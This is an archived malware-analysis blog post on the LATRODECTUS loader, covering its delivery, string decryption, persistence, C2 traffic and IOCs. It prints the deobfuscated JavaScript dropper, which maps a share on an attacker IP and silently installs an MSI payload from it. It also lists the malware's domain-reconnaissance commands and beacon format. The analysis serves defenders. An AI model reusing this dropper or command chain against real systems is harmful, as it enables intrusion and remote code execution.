{
	"id": "00d533c8-978e-478b-b079-9da09cf6ad4e",
	"created_at": "2026-04-06T00:16:14.390606Z",
	"updated_at": "2026-04-10T03:20:17.183941Z",
	"deleted_at": null,
	"sha1_hash": "353bbdeb7e7ec29b59254235d83a1b8bb57f8960",
	"title": "Inside LATRODECTUS: A Dive into Malware Tactics and Mitigation",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1424298,
	"plain_text": "Inside LATRODECTUS: A Dive into Malware Tactics and\r\nMitigation\r\nBy Zyad Waleed Elzyat\r\nPublished: 2024-06-13 · Archived: 2026-04-05 14:25:14 UTC\r\nSummary\r\nLATRODECTUS is a sophisticated malware variant designed to replace the functionality of ICEDID and\r\nalso download it but in this report we will analyze LATRODECTUS only.\r\nLATRODECTUS spreads through phishing emails and malicious attachments. Once executed, it copies\r\nitself into the AppData directory and creates a scheduled task named “Updater” to ensure persistence upon\r\nsystem logon\r\nLATRODECTUS capabilities:\r\nCommand Execution: It can execute various commands received from the C2 server, such as downloading\r\nand running executable files, DLLs.\r\nInformation Gathering: The malware collects comprehensive system information, including IP\r\nconfiguration, system info, domain trusts, network views, and details about antivirus products.\r\nPersistence : The malware establishes persistence by modifying system registries, creating scheduled tasks\r\nfor startup.\r\nLATRODECTUS Delivery\r\n1. The initial stage of the LATRODECTUS infection typically begins with a phishing email.\r\n2. When the victim opens the malicious attachment or clicks on the link, a JavaScript dropper is executed.\r\n3. The JS dropper uses WMI to execute commands and scripts within the Windows environment. WMI allows the\r\nmalware to perform various administrative tasks without raising suspicion.\r\n4. then downloads a malicious MSI (Microsoft Installer) file from a remote server. This MSI file contains the next\r\nstage of the malware\r\n5. After downloading the MSI file, the malware extracts a DLL (Dynamic Link Library) file from it. The DLL is\r\nthen executed using the rundll32 command\r\n6. Once the LATRODECTUS DLL is running, it communicates with a Command and Control (C2) server.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 1 of 17\n\ndef de_Comment(input_file, output_file):\r\n with open(input_file, 'r') as infile, open(output_file, 'w') as outfile:\r\n for line in infile:\r\n if line.startswith('////'):\r\n outfile.write(line[4:])\r\noutput_file = 'out.js'\r\nde_Comment(input_file, output_file)\r\nAfter running the Python script to de-obfuscate the JavaScript file, the code has been transformed into a\r\nmore readable and understandable format. This process unveils the original structure and logic of the code,\r\nmaking it easier to analyze\r\nvar network = new ActiveXObject(\"WScript.Network\");\r\nvar wmi = GetObject(\"winmgmts:\\\\\\\\.\\\\root\\\\cimv2\");\r\nvar attempt = 0;\r\nvar connected = false;\r\nvar driveLetter, letter;\r\nfunction isDriveMapped(letter) {\r\n var drives = network.EnumNetworkDrives();\r\n for (var i = 0; i \u003c drives.length; i += 2) {\r\n if (drives.Item(i) === letter) {\r\n return true;\r\n }\r\n }\r\n return false;\r\n}\r\nfor (driveLetter = 90; driveLetter \u003e= 65 \u0026\u0026 !connected; driveLetter--) {\r\n letter = String.fromCharCode(driveLetter) + \":\";\r\n if (!isDriveMapped(letter)) {\r\n try {\r\n network.MapNetworkDrive(letter, \"\\\\\\\\95.164.3.171@80\\\\share\\\\\");\r\n connected = true;\r\n break;\r\n } catch (e) {\r\n attempt++;\r\n }\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 2 of 17\n\n}\r\n}\r\nif (!connected \u0026\u0026 attempt \u003e 5) {\r\n var command = 'net use ' + letter + ' \\\\\\\\95.164.3.171@80\\\\share\\\\ /persistent:no';\r\n wmi.Get(\"Win32_Process\").Create(command, null, null, null);\r\n var startTime = new Date();\r\n while (new Date() - startTime \u003c 3000) {}\r\n connected = isDriveMapped(letter);\r\n}\r\nif (connected) {\r\n var installCommand = 'msiexec.exe /i \\\\\\\\95.164.3.171@80\\\\share\\\\cisa.msi /qn';\r\n wmi.Get(\"Win32_Process\").Create(installCommand, null, null, null);\r\n try {\r\n network.RemoveNetworkDrive(letter, true, true);\r\n } catch (e) {\r\n }\r\n} else {\r\n WScript.Echo(\"Failed.\");\r\n}\r\nUnpcaking\r\nUpon encountering malware embedded within an MSI file, I employed “UniExtract” to extract the DLL\r\nfile concealed within.\r\nPress enter or click to view image in full size\r\nTo expedite the unpacking process, I’ve opted to utilize [unpackme](https://www.unpac.me/), a service\r\nspecifically designed for efficiently unpacking malwares and now the sample is ready for analysis.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 3 of 17\n\nAPI Hashing\r\nThe LATRODECTUS DLL contains four export functions. These exports are essentially entry points that\r\ncan be called by other programs or system processes. Despite having multiple names, all four exports direct\r\nexecution to the same underlying function within the DLL.\r\nPress enter or click to view image in full size\r\nand when go into that function i found this function and inside it there are 6 functions contains alot of\r\nhashes that malware use it for API Hashing and try to resolve it with hashdb\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 4 of 17\n\nLATRODECTUS Use CR32 For API Hashing to resolve kernel32.dll and ntdll.dll modules and their\r\nfunctions. In order to resolve additional libraries such as user32.dll or wininet.dll and search for all “.dll”\r\nFiles In System.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 5 of 17\n\nString Decryption\r\nI used [0x0d4y](https://0x0d4y.blog/case-study-analyzing-and-implementing-string-decryption-algorithms-latrodectus/) Script to decipher encrypted strings within the malware sample. After customizing the script\r\nto generate the output in a text file format, I executed it to obtain the decrypted strings for further\r\nexamination.\r\nimport pefile\r\nimport re\r\ndef format_string(encoded_string: bytes) -\u003e str:\r\n try:\r\n formatted_string = encoded_string.decode('utf-8')\r\n if formatted_string.isascii():\r\n return formatted_string\r\n except UnicodeDecodeError:\r\n pass\r\n return \"Not an ASCII String\"\r\ndef decrypt_string(data_enc: bytes, xor_key: int) -\u003e str:\r\n decrypted_strings = bytearray()\r\n for enc_data in data_enc:\r\n xor_key += 1\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 6 of 17\n\ndecrypted_strings.append(enc_data ^ (xor_key \u0026 0xFF))\r\n return format_string(decrypted_strings)\r\ndata_section = next((s for s in pe.sections if b'.data' in s.Name), None)\r\ndata = data_section.get_data()\r\nfirst_data_byte = data[0]\r\nreferences = []\r\nfor section in pe.sections:\r\n if b'.data' in section.Name:\r\n data = section.get_data()\r\n index = data.find(first_data_byte)\r\n while index != -1:\r\n references.append(section.VirtualAddress + index)\r\n index = data.find(first_data_byte, index + 1)\r\noutput_file = \"output.txt\"\r\nwith open(output_file, \"w\") as f:\r\n for ref in references:\r\n encryption_key = pe.get_data(ref, 1)[0]\r\n f.write(\"\\033[33m\\nXOR Initial Key: \\033[0m\" + hex(encryption_key) + \"\\n\")\r\n data_length = encryption_key ^ pe.get_data(ref + 4, 1)[0]\r\n f.write(\"\\033[34mEncrypted Data Block Length: \\033[0m\" + str(data_length) + \"\\n\")\r\n encrypted_data = pe.get_data(ref, data_length + 6)[6:]\r\n f.write(\"\\033[31mEncrypted Data Block: \\033[0m\" + hex(int.from_bytes(encrypted_data, byteorde\r\n decrypted_str = decrypt_string(encrypted_data, encryption_key)\r\n f.write(\"\\033[32mDecrypted String:\\033[0m\" + decrypted_str + \"\\n\")\r\nwith open(output_file, \"r\") as f:\r\n output_text = f.read()\r\npattern = r\".*Decrypted String:.*\"\r\nresult = re.findall(pattern, output_text)\r\ncleaned_output_file = \"cleaned_output.txt\"\r\nwith open(cleaned_output_file, \"w\") as f:\r\n for line in result:\r\n f.write(line + \"\\n\")\r\nprint(\"Decrypted String saved to:\", cleaned_output_file)\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 7 of 17\n\nDecrypted String:/c ipconfig /all\r\nDecrypted String:C:\\Windows\\System32\\cmd[.]exe\r\nDecrypted String:/c systeminfo\r\nDecrypted String:/c nltest /domain_trusts\r\nDecrypted String:/c net view /all /domain\r\nDecrypted String:/c nltest /domain_trusts /all_trusts\r\nDecrypted String:/c net view /all\r\nDecrypted String:\u0026ipconfig=\r\nDecrypted String:/c net group \"Domain Admins\" /domain\r\nDecrypted String:/Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Forma\r\nDecrypted String:C:\\Windows\\System32\\wbem\\wmic.exe\r\nDecrypted String:/c net config workstation\r\nDecrypted String:/c wmic.exe /node:localhost /names\r\nDecrypted String:R6[2M\u003eB2Z\r\nDecrypted String:/c whoami /groups\r\nDecrypted String:\u0026systeminfo=\r\nDecrypted String:\u0026domain_trusts=\r\nDecrypted String:\u0026domain_trusts_all=\r\nDecrypted String:\u0026net_view_all_domain=\r\nDecrypted String:\u0026net_view_all=\r\nDecrypted String:\u0026net_group=\r\nDecrypted String:\u0026wmic=\r\nDecrypted String:\u0026net_config_ws=\r\nDecrypted String:\u0026net_wmic_av=\r\nDecrypted String:\u0026whoami_group=\r\nDecrypted String:{\r\nDecrypted String:\"pid\":\r\nDecrypted String:\"%d\",\r\nDecrypted String: \"proc\":\r\nDecrypted String:\"%s\",\r\nDecrypted String: \"subproc\": [\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 8 of 17\n\nDecrypted String:]\r\nDecrypted String:}\r\nDecrypted String:\u0026proclist=[\r\nDecrypted String:{\r\nDecrypted String:\"pid\":\r\nDecrypted String:\"%d\",\r\nDecrypted String:\"proc\":\r\nDecrypted String:\"%s\",\r\nDecrypted String:\"subproc\": [\r\nDecrypted String:]\r\nDecrypted String:}\r\nDecrypted String:\u0026desklinks=[\r\nDecrypted String:*.*\r\nDecrypted String:\"%s\"\r\nDecrypted String:]\r\nDecrypted String:Update_%x\r\nDecrypted String:Custom_update\r\nDecrypted String:.dll\r\nDecrypted String:.exe\r\nDecrypted String:Updater\r\nDecrypted String:\"%s\"\r\nDecrypted String:rundll32.exe\r\nDecrypted String:\"%s\", %s %s\r\nDecrypted String:runnung\r\nDecrypted String::wtfbbq\r\nDecrypted String:%d\r\nDecrypted String:files/bp.dat\r\nDecrypted String:%s\\%d.dll\r\nDecrypted String:%d[.]dat\r\nDecrypted String:%s\\%s\r\nDecrypted String:init -zzzz=\"%s\\%s\"\r\nDecrypted String:front\r\nDecrypted String:/files/\r\nDecrypted String:Littlehw\r\nDecrypted String:.exe\r\nDecrypted String: Content-Type application/x-www-form-urlencoded\r\nDecrypted String:POST\r\nDecrypted String:GET\r\nDecrypted String:curl/7.88.1\r\nDecrypted String:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\nDecrypted String:CLEARURL\r\nDecrypted String:URLS\r\nDecrypted String:COMMAND\r\nDecrypted String:ERROR\r\nDecrypted String:12345\r\nDecrypted String:counter=%d\u0026type=%d\u0026guid=%s\u0026os=%d\u0026arch=%d\u0026username=%s\u0026group=%lu\u0026ver=%d.%d\u0026up=%d\u0026direc\r\nDecrypted String:\u003c!DOCTYPE\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 9 of 17\n\nDecrypted String:%s%d.dll\r\nDecrypted String:\u003chtml\u003e\r\nDecrypted String:\u003c!DOCTYPE\r\nDecrypted String:%s%d[.]exe\r\nDecrypted String:LogonTrigger\r\nDecrypted String:%x%x\r\nDecrypted String:TimeTrigger\r\nDecrypted String:PT1H%02dM\r\nDecrypted String:\u0026mac=\r\nDecrypted String:;\r\nDecrypted String:%04d-%02d-%02dT%02d:%02d:%02d\r\nDecrypted String:%02x\r\nDecrypted String::%02x\r\nDecrypted String:PT0S\r\nDecrypted String:\u0026computername=%s\r\nDecrypted String:\u0026domain=%s\r\nDecrypted String:\\*.dll\r\nDecrypted String:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\r\nDecrypted String:%04X%04X%04X%04X%08X%04X\r\nDecrypted String:\\Registry\\Machine\\\r\nDecrypted String:AppData\r\nDecrypted String:Desktop\r\nDecrypted String:Startup\r\nDecrypted String:Personal\r\nDecrypted String:Local AppData\r\nDecrypted String:Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\r\nDecrypted String:hxxps[://]aytobusesre[.]com/live/\r\nDecrypted String:hxxps[://]scifimond[.]com/live/\r\nDecrypted String:C:\\WINDOWS\\SYSTEM32\\rundll32[.]exe %s,%s\r\nDecrypted String:C:\\WINDOWS\\SYSTEM32\\rundll32[.]exe %s\r\nDecrypted String:\\update_data.dat\r\nDecrypted String:URLS|%d|%s\r\nand ahmedskasmani script to use it inside ida pro with some modifications.\r\nimport idaapi, idc, idautils\r\ndef find_fn_Xrefs(fn_addr):\r\n xref_list = []\r\n for ref in idautils.XrefsTo(fn_addr):\r\n xref = {}\r\n xref['normal'] = ref.frm\r\n xref['hex'] = hex(ref.frm)\r\n xref_list.append(xref)\r\n return xref_list\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 10 of 17\n\ndef get_bytes_from_address(addr, length):\r\n ea = addr\r\n ret_data = bytearray()\r\n for i in range(0, length):\r\n data = idc.get_bytes(ea + i, 1)\r\n ret_data.append(data[0])\r\n i += 1\r\n return ret_data\r\ndef get_fastcall_args_number(fn_addr, arg_number):\r\n args = []\r\n arg_count = 0\r\n ptr_addr = fn_addr\r\n while True:\r\n ptr_addr = idc.prev_head(ptr_addr)\r\n \r\n if idc.print_insn_mnem(ptr_addr) == 'mov' or idc.print_insn_mnem(ptr_addr) == 'lea':\r\n arg_count += 1\r\n if arg_count == arg_number:\r\n if idc.get_operand_type(ptr_addr, 1) == idc.o_mem:\r\n args.append(idc.get_operand_value(ptr_addr, 1))\r\n elif idc.get_operand_type(ptr_addr, 1) == idc.o_imm:\r\n args.append(idc.get_operand_value(ptr_addr, 1))\r\n elif idc.get_operand_type(ptr_addr, 1) == idc.o_reg:\r\n reg_name = idaapi.get_reg_name(idc.get_operand_value(ptr_addr, 1), 4)\r\n reg_value = get_reg_value(ptr_addr, reg_name)\r\n args.append(reg_value)\r\n else:\r\n \r\n print(\"Exception in get_stack_args\")\r\n return\r\n return args\r\n else:\r\n continue\r\n return args\r\ndef decode_str(s) -\u003e str:\r\n is_wide_str = len(s) \u003e 1 and s[1] == 0\r\n result_str = \"\"\r\n if not is_wide_str:\r\n result_str = s.decode(\"utf8\")\r\n else:\r\n result_str = s.decode(\"utf-16le\")\r\n if result_str.isascii():\r\n return result_str\r\n return \"\"\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 11 of 17\n\ndef decrypt(a1):\r\n result = bytearray()\r\n key = a1[0]\r\n result_len = a1[4] ^ a1[0]\r\n v8 = 6\r\n extracted_data = a1[6:6 + result_len]\r\n for i in range(result_len):\r\n key = (key + 1) % 256\r\n print(f\"Debug: key: {hex(key)}, extracted_data[i] : {hex(extracted_data[i])}, result: {extrac\r\n result.append((extracted_data[i] ^ key) % 256)\r\n print(f\"Debug: {len(result)} | {result}\")\r\n return decode_str(result)\r\ndef set_hexrays_comment(address, text):\r\n print(\"Setting hex rays comment\")\r\n \r\n cfunc = idaapi.decompile(address)\r\n tl = idaapi.treeloc_t()\r\n tl.ea = address\r\n tl.itp = idaapi.ITP_SEMI\r\n if cfunc:\r\n cfunc.set_user_cmt(tl, text)\r\n cfunc.save_user_cmts()\r\n else:\r\n print(\"Decompile failed: {:#x}\".format(address))\r\ndef set_comment(address, text):\r\n idc.set_cmt(address, text, 0)\r\n set_hexrays_comment(address, text)\r\ndecryption_fn_address = 0x000000018000ACC8\r\nxref_list = find_fn_Xrefs(decryption_fn_address)\r\nfor ref in xref_list:\r\n print(\"\")\r\n print(f\"Func Address : {ref['hex']}, {ref['normal']}\")\r\n arg_address_hex = hex(get_fastcall_args_number(ref['normal'], 1)[0])\r\n arg_address = get_fastcall_args_number(ref['normal'], 1)[0]\r\n enc_value = get_bytes_from_address(arg_address, 8)\r\n \r\n print(f\"Debug: enc_value[0] : {hex(enc_value[0])}, enc_value[4]: {hex(enc_value[4])}\")\r\n result_str_len = enc_value[0] ^ enc_value[4]\r\n print(f\"result char count : {result_str_len}\")\r\n enc_value = get_bytes_from_address(arg_address, 6 + result_str_len)\r\n if b'\\xff\\xff\\xff\\xff' not in enc_value:\r\n print(f\"Debug: len : {len(enc_value)}, enc_value: {enc_value}\")\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 12 of 17\n\ndec_string = decrypt(enc_value)\r\n print(f\"Decrypted String: {dec_string}\")\r\n set_comment(ref['normal'], dec_string)\r\nCollecting System Information\r\nThe Malware run these commands to collect system information and try for enumeration , and check the\r\nAV\r\nC:\\Windows\\System32\\cmd.exe /c ipconfig /all\r\nC:\\Windows\\System32\\cmd.exe /c systeminfo\r\nC:\\Windows\\System32\\cmd.exe /c nltest /domain_trusts\r\nC:\\Windows\\System32\\cmd.exe /c net view /all /domain\r\nC:\\Windows\\System32\\cmd.exe /c nltest /domain_trusts /all_trusts\r\nC:\\Windows\\System32\\cmd.exe /c net view /all\r\nC:\\Windows\\System32\\cmd.exe /c net group \"Domain Admins\" /domain\r\nC:\\Windows\\System32\\wbem\\wmic.exe /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusPro\r\nDecrypted String:C:\\Windows\\System32\\wbem\\wmic.exe\r\nC:\\Windows\\System32\\cmd.exe /c net config workstation\r\nC:\\Windows\\System32\\cmd.exe /c wmic.exe /node:localhost /names\r\nC:\\Windows\\System32\\cmd.exe /c whoami /groups\r\nPress enter or click to view image in full size\r\nPersistence\r\nit’s evident that the malware employs a sophisticated persistence mechanism to ensure its execution and\r\npropagation within the system. Here’s a breakdown of its methodology:\r\nUtilization of rundll32 Command: The malware utilizes the rundll32 command to execute itself discreetly\r\nwithin the system environment. This technique allows the malware to masquerade as a legitimate Windows\r\nprocess, potentially evading detection by security software.\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 13 of 17\n\nCreation of Copy in AppData Directory: Following execution, the malware creates a duplicate of itself in\r\nthe directory path:\r\n\"C:\\Users'Username'\\AppData\\Roaming\\Custom_update\\Update_….dll\"\r\nBy placing the copy in the AppData directory, a common location for storing application data, the malware\r\nattempts to blend in with legitimate files and avoid suspicion.\r\nTask Scheduler Entry for Persistent Execution: To ensure persistent execution across system reboots, the\r\nmalware sets up a task scheduler entry. This entry is configured to run the copied DLL file upon user login,\r\nthereby perpetuating the malware’s activity even after system restarts.\r\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 14 of 17\n\nC2 Extraction\r\nPress enter or click to view image in full size\r\ncounter=0\u0026type=1\u0026guid=249507485CA29F24F77B0F43D7BA\u0026os=6\u0026arch=1\u0026username=user\u0026group=510584660\u0026ver=1.1\u0026\r\nContent-Type: application/x-www-form-urlencoded\r\nGet Zyad Waleed Elzyat’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\nFirst Domain : hxxps[://]aytobusesre[.]com\r\nSecond Domain : hxxps[://]scifimond[.]com\r\nusername : infected user\r\ndirection : C2 Domain\r\nmac : Mac Address\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 15 of 17\n\ncomputername : host name\r\nos : Windows Version\r\narch : Machine Arch Type\r\nIOC’s\r\n1. JS SHA-256: 4ff60df7d165862e652f73752eb98cf92202a2d748b055ff1f99d4172fa4c92f\r\n2. MSI SHA-256 : 3a950d7e6736f17c3df90844c76d934dc66c17ec76841a4ad58de07af7955f0f\r\n3. SHA-256 DLL Packed : aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c\r\n4. First Domain : hxxps[://]aytobusesre[.]com\r\n5. Second Domain : hxxps[://]scifimond[.]com\r\n6. IP’s :\r\n104.21.78.238\r\n172.67.138.110\r\n188.114.96.9\r\n188.114.97.9\r\n188.114.96.0\r\n188.114.97.0\r\n104.21.23.12\r\n172.67.208.70\r\n188.114.97.7\r\n188.114.96.7\r\nreferences\r\n[Elastic Report :(https://www.elastic.co/security-labs/spring-cleaning-with-latrodectus)\r\n[0x0d4y Python Script](https://0x0d4y.blog/case-study-analyzing-and-implementing-string-decryption-algorithms-latrodectus/)\r\n[AhmedS Kasmani Latrodectus — Malware Analysis Part 1](https://www.youtube.com/watch?v=Ji89-\r\nUrr4I0\u0026t=1s)\r\n[AhmedS Kasmani Latrodectus — Malware Analysis Part 2](https://www.youtube.com/watch?\r\nv=yUYxVypfvUM\u0026t=1123s)\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 16 of 17\n\nSource: https://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea"
	],
	"report_names": [
		"inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea"
	],
	"threat_actors": [],
	"ts_created_at": 1775434574,
	"ts_updated_at": 1775791217,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/353bbdeb7e7ec29b59254235d83a1b8bb57f8960.pdf",
		"text": "https://archive.orkl.eu/353bbdeb7e7ec29b59254235d83a1b8bb57f8960.txt",
		"img": "https://archive.orkl.eu/353bbdeb7e7ec29b59254235d83a1b8bb57f8960.jpg"
	}
}